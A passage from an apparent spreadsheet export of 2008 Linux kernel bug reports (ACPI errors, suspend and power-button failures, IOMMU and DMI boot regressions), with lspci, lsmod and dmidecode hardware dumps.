1: CFlE- CST- CFE- &lt;LkFail+ Init- EOC+ TXO+ &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 1: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 1.03 Link Frequency 0: 800MHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC+ LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 200MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz- 300MHz- 400MHz- 500MHz- 600MHz- 800MHz- 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE+ OFlE+ PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [e0] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 00:0a.0 ISA bridge: nVidia Corporation MCP51 LPC Bridge (rev a3) Subsystem: nVidia Corporation Device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:0a.1 SMBus: nVidia Corporation MCP51 SMBus (rev a3) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 10 Region 4: I/O ports at 3040 [size=64] Region 5: I/O ports at 3000 [size=64] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: nForce2_smbus Kernel modules: i2c-nforce2 00:0a.3 Co-processor: nVidia Corporation MCP51 PMU (rev a3) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 10 Region 0: Memory at c0040000 (32-bit, non-prefetchable) [size=256K] 00:0b.0 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) (prog-if 10) Subsystem: nVidia Corporation Device cb84 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 22 Region 0: Memory at c0004000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:0b.1 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) (prog-if 20) Subsystem: nVidia Corporation Device cb84 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 23 Region 0: Memory at c0005000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] Debug port: BAR=1 offset=0098 Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:0d.0 IDE interface: nVidia Corporation MCP51 IDE (rev f1) (prog-if 8a [Master SecP PriP]) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (750ns min, 250ns max) Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size=1] Region 4: I/O ports at 3080 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: AMD_IDE Kernel modules: amd74xx 00:0e.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev f1) (prog-if 85 [Master SecO PriO]) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 21 Region 0: I/O ports at 30b0 [size=8] Region 1: I/O ports at 30a4 [size=4] Region 2: I/O ports at 30a8 [size=8] Region 3: I/O ports at 30a0 [size=4] Region 4: I/O ports at 3090 [size=16] Region 5: Memory at c0006000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/2 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [cc] HyperTransport: MSI Mapping Enable+ Fixed+ Kernel driver in use: sata_nv Kernel modules: sata_nv 00:10.0 PCI bridge: nVidia Corporation MCP51 PCI Bridge (rev a2) (prog-if 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=07, subordinate=07, sec-latency=64 I/O behind bridge: 00006000-00006fff Memory behind bridge: c4000000-c40fffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr+ DiscTmrStat- DiscTmrSERREn- Capabilities: [b8] Subsystem: nVidia Corporation Device cb84 Capabilities: [8c] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 00:10.1 Audio device: nVidia Corporation MCP51 High Definition Audio (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (500ns min, 1250ns max) Interrupt: pin B routed to IRQ 19 Region 0: Memory at c0000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask+ 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Masking: 00000000 Pending: 00000000 Capabilities: [6c] HyperTransport: MSI Mapping Enable+ Fixed+ Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:14.0 Bridge: nVidia Corporation MCP51 Ethernet Controller (rev a3) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 20 Region 0: Memory at c0007000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at 30b8 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=0 PME- Kernel driver in use: forcedeth Kernel modules: forcedeth 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [80] HyperTransport: Host or Secondary Interface !!! Possibly incomplete decoding Command: WarmRst+ DblEnd- Link Control: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=8 Link Config: MLWI=16bit MLWO=16bit LWI=16bit LWO=16bit Revision ID: 1.02 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [f0] Secure device &lt;?&gt; Kernel driver in use: k8temp Kernel modules: k8temp 05:00.0 VGA compatible controller: nVidia Corporation GeForce 8600M GS (rev a1) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at c1000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at d0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at c2000000 (64-bit, non-prefetchable) [size=32M] Region 5: I/O ports at 5000 [size=128] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [68] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [78] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;4us ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;4us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 128 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100] Virtual Channel &lt;?&gt; Capabilities: [128] Power Budgeting &lt;?&gt; Capabilities: [600] Vendor Specific Information &lt;?&gt; Kernel modules: nvidiafb 07:06.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev c0) (prog-if 10) Sub</t>
  </si>
  <si>
    <t>ACPI Error: No handler for Region, Method execution failed, hang on reboot</t>
  </si>
  <si>
    <t>2008-09-27 07:08 UTC</t>
  </si>
  <si>
    <t>Eugeny Shkrigunov</t>
  </si>
  <si>
    <t>2008-10-27 19:19 UTC</t>
  </si>
  <si>
    <t>Distribution: CentOS 5.2 Hardware Environment: MSI PR210-052 Problem Description: No battery status, hang on reboot Steps to reproduce: build kernel 2.6.27-rc7 and boot to it</t>
  </si>
  <si>
    <t>acpi errors and random freeze on sony vaio sr</t>
  </si>
  <si>
    <t>2.6.27 RC7</t>
  </si>
  <si>
    <t>2008-09-28 03:48 UTC</t>
  </si>
  <si>
    <t>Giovanni Pellerano</t>
  </si>
  <si>
    <t>2008-12-13 10:49 UTC</t>
  </si>
  <si>
    <t>power button stops working after suspend (irq 9: nobody cared)</t>
  </si>
  <si>
    <t>2.6.25-2-686 #1 SMP Fri Jul 18 17:46:56 UTC 2008</t>
  </si>
  <si>
    <t>2008-09-28 14:23 UTC</t>
  </si>
  <si>
    <t>Andrew Shadura</t>
  </si>
  <si>
    <t>2009-03-18 17:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.17-2-686 Earliest failing kernel version: 2.6.24-etchnhalf.1-686 Distribution: Debian GNU/Linux "lenny" Hardware Environment: [root#pc-linux:~]: cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 3 model name : Intel(R) Celeron(R) CPU 2.66GHz stepping : 3 cpu MHz : 2672.803 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc up pebs bts pni monitor ds_cpl cid bogomips : 5351.00 clflush size : 64 [root#pc-linux:~]: lspci 00:00.0 Host bridge: Intel Corporation 82865G/PE/P DRAM Controller/Host-Hub Interface (rev 02) 00:01.0 PCI bridge: Intel Corporation 82865G/PE/P PCI to AGP Controller (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev c2) 00:1f.0 ISA bridge: Intel Corporation 82801EB/ER (ICH5/ICH5R) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) 00:1f.5 Multimedia audio controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) AC'97 Audio Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 440 AGP 8x] (rev c1) 02:00.0 Ethernet controller: 3Com Corporation 3c905C-TX/TX-M [Tornado] (rev 78) 02:09.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 08) 02:09.1 Input device controller: Creative Labs SB Live! Game Port (rev 08) Software Environment: lsmod output: Module Size Used by lirc_serial 14356 0 lirc_dev 13348 1 lirc_serial snd_rtctimer 3648 1 binfmt_misc 11144 1 nfsd 199568 13 lockd 59752 2 nfsd nfs_acl 3520 1 nfsd auth_rpcgss 39168 1 nfsd sunrpc 171872 11 nfsd,lockd,nfs_acl,auth_rpcgss exportfs 4768 1 nfsd ircomm_tty 22376 0 ircomm 12932 1 ircomm_tty irtty_sir 6176 0 sir_dev 13764 1 irtty_sir irda_usb 14660 0 irda 106200 4 ircomm_tty,ircomm,sir_dev,irda_usb crc_ccitt 2176 1 irda ppdev 8676 0 lp 11012 0 ac 4448 0 battery 8448 0 ipv6 241956 23 nls_cp1251 4960 3 ntfs 196000 3 nls_base 7268 2 nls_cp1251,ntfs fuse 44348 1 dm_snapshot 17444 0 dm_mirror 25316 0 dm_mod 55656 2 dm_snapshot,dm_mirror w83627hf 23512 0 hwmon_vid 3040 1 w83627hf snd_intel8x0 31740 0 snd_emu10k1_synth 6816 0 snd_emux_synth 30560 1 snd_emu10k1_synth snd_seq_virmidi 6720 1 snd_emux_synth snd_seq_midi_emul 5856 1 snd_emux_synth snd_emu10k1 122720 1 snd_emu10k1_synth firmware_class 9088 2 irda_usb,snd_emu10k1 snd_ac97_codec 91300 2 snd_intel8x0,snd_emu10k1 snd_pcm_oss 37824 0 snd_mixer_oss 14880 1 snd_pcm_oss ac97_bus 1952 1 snd_ac97_codec snd_seq_dummy 3780 0 emu10k1_gp 3680 0 snd_pcm 68228 4 snd_intel8x0,snd_emu10k1,snd_ac97_codec,snd_pcm_oss snd_util_mem 4544 2 snd_emux_synth,snd_emu10k1 snd_hwdep 8708 2 snd_emux_synth,snd_emu10k1 snd_seq_oss 28544 0 snd_seq_midi 8064 0 snd_rawmidi 22528 3 snd_seq_virmidi,snd_emu10k1,snd_seq_midi snd_seq_midi_event 6976 3 snd_seq_virmidi,snd_seq_oss,snd_seq_midi snd_seq 45872 10 snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq_midi_event snd_timer 21320 4 snd_rtctimer,snd_emu10k1,snd_pcm,snd_seq snd_seq_device 7564 8 snd_emu10k1_synth,snd_emux_synth,snd_emu10k1,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_rawmidi,snd_seq rng_core 4900 0 i2c_i801 9520 0 snd 48772 15 snd_intel8x0,snd_emux_synth,snd_seq_virmidi,snd_emu10k1,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_hwdep,snd_seq_oss,snd_rawmidi,snd_seq,snd_timer,snd_seq_device button 8240 0 psmouse 35920 0 shpchp 29716 0 soundcore 7488 1 snd iTCO_wdt 11204 0 serio_raw 6532 0 i2c_core 22548 1 i2c_i801 evdev 11328 3 snd_page_alloc 9992 3 snd_intel8x0,snd_emu10k1,snd_pcm pci_hotplug 26980 1 shpchp parport_pc 25860 1 parport 33868 3 ppdev,lp,parport_pc pcspkr 3136 0 analog 11488 0 rtc 14272 1 snd_rtctimer gameport 14124 3 emu10k1_gp,analog ext3 120360 3 jbd 43444 1 ext3 mbcache 8260 1 ext3 ide_cd_mod 32864 0 cdrom 31872 1 ide_cd_mod ide_disk 13952 9 ide_pci_generic 4228 0 [permanent] piix 7176 0 [permanent] ide_core 100312 4 ide_cd_mod,ide_disk,ide_pci_generic,piix floppy 53284 0 ata_generic 8004 0 libata 142288 1 ata_generic 3c59x 39976 0 mii 5248 1 3c59x scsi_mod 138668 1 libata dock 10448 1 libata ehci_hcd 32620 0 uhci_hcd 22352 0 usbcore 130032 4 irda_usb,ehci_hcd,uhci_hcd thermal 19100 0 processor 39660 1 thermal fan 5636 0 [Please note that kernel module nvidia is blacklisted just for test. Problem is present independently of is it loaded or not] Problem Description: After first suspend-to-ram (I use s2ram) and resuming system then, power button stops working: acpid doesn't see it anymore. See logs attached for details. Steps to reproduce: 1. Attach `/usr/sbin/s2ram -f -a 3` command to power button in acpid configuration file. 2. `/usr/sbin/s2ram -f -a 3` -&gt; system suspends 3. Press power button -&gt; system wakes up, messages about disabling irq 9 are written in kern.log 4. Press it again -&gt; system should suspend again but it doesn't 5. Press it again and again -&gt; still no reaction</t>
  </si>
  <si>
    <t>when CPU hotplugging is disabled, nr_cpu_ids does not get set properly during boot</t>
  </si>
  <si>
    <t>2.6.27-rc7-git5</t>
  </si>
  <si>
    <t>2008-09-29 11:40 UTC</t>
  </si>
  <si>
    <t>2008-10-26 15:14 UTC</t>
  </si>
  <si>
    <t>caused by commit 4a7017370aa0a94a00ae5b5705e9169cdcae5fb8, which was the wrong fix for a compile error With NR_CPUS set to 512 and CPU hotplug disabled, nr_cpu_ids gets set to 512 during boot on a uniprocessor machine. Patches to fix this follow.</t>
  </si>
  <si>
    <t>2.6.27-rc2 to rc8, apgart fails, iommu=soft works, regression</t>
  </si>
  <si>
    <t>2008-09-30 10:24 UTC</t>
  </si>
  <si>
    <t>2008-10-07 07:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.x Earliest failing kernel version: 2.6.27-rc2 Distribution: Gentoo/~amd64, mainline kernel Hardware Environment: Tyan s2885 mobo, dual Opteron 290s, 8 gig RAM, Software Environment: root is reiserfs on 4-spindle MDP/RAID-6, on SATA (SATA_SIL) Problem Description: Kernels from 2.6.27-rc2 thru rc8 won't boot with GART IOMMU enabled. They boot fine with iommu=soft. Thru 2.6.26.x worked fine with GART IOMMU enabled, so this is a regression. I haven't tried rc1. I normally run radeon-framebuffer @ 1920x1200, and wasn't seeing any of the kernel output, just (usually) a quite early spontaneous reboot. Using vga=ask, I found I got kernel output to the console if I used text modes, but not using graphics/vesa modes. The output stops right after it loads the GART IOMMU into the aperture, 256 meg of the 512 meg BIOS-set aperture. Very occasionally I get a set of four more lines after that, obviously 4-way matched, but no further and I seldom get that. Again, usually a spontaneous reboot, sometimes just a freeze. (I believe I have reboot on panic set, does it get read this early?) Due to an INVALID bug #11450 (my problem, not yours) earlier, I didn't get a successful compile past -rc2 until late in the game, and was busy then, thus the report this late in the cycle. I compile using gcc-4.3.1 using the following CFLAGS, which I used for 2.6.26 as well, where they work fine: CFLAGS="-march=k8 -pipe -msse3 -O2 -frename-registers -fweb -fmerge-all-constants -fgcse-sm -fgcse-las -fgcse-after-reload -ftree-vectorize -fdirectives-only -freorder-blocks-and-partition -combine" I'll attach my config and a successful boot log using iommu=soft and another from 2.6.26.x. Getting the failed boot will be harder tho I could hand-copy the lines, but as I said the last line is usually the 256 meg IOMMU assignment in the aperture, and iommu=soft works, so...</t>
  </si>
  <si>
    <t>ASUS P5QL Pro: Early kernel exception in dmi_table</t>
  </si>
  <si>
    <t>2008-10-03 14:05 UTC</t>
  </si>
  <si>
    <t>Felix Geyer</t>
  </si>
  <si>
    <t>2008-10-13 07:13 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">Directly after boot the kernel crashes. This bug seems to only affect systems that use the motherboard ASUS P5QL Pro. I use the (currently most recent) BIOS version 0601. The bug has been introduced between 2.6.24 and 2.6.25-rc1. Error messages on 2.6.27 (Ubuntu 8.10 beta): i386: BUG: Int 14: CR2 ffb41000 x86_64: PANIC: early exception 0e rip 10:ffffffff8044e0da error 0 cr2 ffffffffff341000 Photos of the complete output (with earlyprintk=vga): http://launchpadlibrarian.net/18159850/ubuntu_8.10_beta_i386.jpg http://launchpadlibrarian.net/18159860/ubuntu_8.10_beta_amd64_alt.jpg I tracked down the commit that causes the problem (using git bisect): http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1fd6a53ddc75d02ad0f363cb42f2a1cec6b701c2 dmidecode: # dmidecode 2.9 SMBIOS 2.5 present. 62 structures occupying 2289 bytes. Table at 0x000F0710. Handle 0x0000, DMI type 0, 24 bytes BIOS Information Vendor: American Megatrends Inc. Version: 0601 Release Date: 08/26/2008 Address: 0xF0000 Runtime Size: 64 kB ROM Size: 1024 kB Characteristics: ISA is supported PCI is supported PNP is supported APM is supported BIOS is upgradeable BIOS shadowing is allowed ESCD support is available Boot from CD is supported Selectable boot is supported BIOS ROM is socketed EDD is supported 5.25"/1.2 MB floppy services are supported (int 13h) 3.5"/720 KB floppy services are supported (int 13h) 3.5"/2.88 MB floppy services are supported (int 13h) Print screen service is supported (int 5h) 8042 keyboard services are supported (int 9h) Serial services are supported (int 14h) Printer services are supported (int 17h) CGA/mono video services are supported (int 10h) ACPI is supported USB legacy is supported LS-120 boot is supported ATAPI Zip drive boot is supported BIOS boot specification is supported Targeted content distribution is supported BIOS Revision: 6.1 Handle 0x0001, DMI type 1, 27 bytes System Information Manufacturer: System manufacturer Product Name: P5QL PRO Version: System Version Serial Number: System Serial Number UUID: 00C3276C-A64B-DD11-AD10-0022153B35C2 Wake-up Type: Power Switch SKU Number: To Be Filled By O.E.M. Family: To Be Filled By O.E.M. Handle 0x0002, DMI type 2, 15 bytes Base Board Information Manufacturer: ASUSTeK Computer INC. Product Name: P5QL PRO Version: Rev 1.xx Serial Number: MS1C87B02002859 Asset Tag: To Be Filled By O.E.M. Features: Board is a hosting board Board is replaceable Location In Chassis: To Be Filled By O.E.M. Chassis Handle: 0x0003 Type: Motherboard Contained Object Handles: 0 Handle 0x0003, DMI type 3, 21 bytes Chassis Information Manufacturer: Chassis Manufacture Type: Desktop Lock: Not Present Version: Chassis Version Serial Number: Chassis Serial Number Asset Tag: Asset-1234567890 Boot-up State: Safe Power Supply State: Safe Thermal State: Safe Security Status: None OEM Information: 0x00000011 Height: Unspecified Number Of Power Cords: 1 Contained Elements: 0 Handle 0x0004, DMI type 4, 40 bytes Processor Information Socket Designation: LGA775 Type: Central Processor Family: &lt;OUT OF SPEC&gt; Manufacturer: Intel ID: FB 06 00 00 FF FB EB BF Version: Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz Voltage: 1.3 V External Clock: 266 MHz Max Speed: 3800 MHz Current Speed: 2400 MHz Status: Populated, Enabled Upgrade: Other L1 Cache Handle: 0x0005 L2 Cache Handle: 0x0006 L3 Cache Handle: 0x0007 Serial Number: To Be Filled By O.E.M. Asset Tag: To Be Filled By O.E.M. Part Number: To Be Filled By O.E.M. Core Count: 4 Core Enabled: 4 Thread Count: 4 Characteristics: 64-bit capable Handle 0x0005, DMI type 7, 19 bytes Cache Information Socket Designation: L1-Cache Configuration: Enabled, Not Socketed, Level 1 Operational Mode: Write Back Location: Internal Installed Size: 128 KB Maximum Size: 128 KB Supported SRAM Types: Other Installed SRAM Type: Other Speed: Unknown Error Correction Type: Parity System Type: Data Associativity: 8-way Set-associative Handle 0x0006, DMI type 7, 19 bytes Cache Information Socket Designation: L2-Cache Configuration: Enabled, Not Socketed, Level 2 Operational Mode: Write Back Location: Internal Installed Size: 8192 KB Maximum Size: 8192 KB Supported SRAM Types: Other Installed SRAM Type: Other Speed: Unknown Error Correction Type: Single-bit ECC System Type: Unified Associativity: 16-way Set-associative Handle 0x0007, DMI type 7, 19 bytes Cache Information Socket Designation: L3-Cache Configuration: Disabled, Not Socketed, Level 3 Operational Mode: Unknown Location: Internal Installed Size: 0 KB Maximum Size: 0 KB Supported SRAM Types: Unknown Installed SRAM Type: Unknown Speed: Unknown Error Correction Type: Unknown System Type: Unknown Associativity: Unknown Handle 0x0008, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: PS/2 Keyboard Internal Connector Type: None External Reference Designator: PS/2 Keyboard External Connector Type: PS/2 Port Type: Keyboard Port Handle 0x0009, DMI type 8, 9 bytes Port Connector Information Internal Reference Designator: PS/2 Mouse Internal Connector Type: None External Reference Designator: PS/2 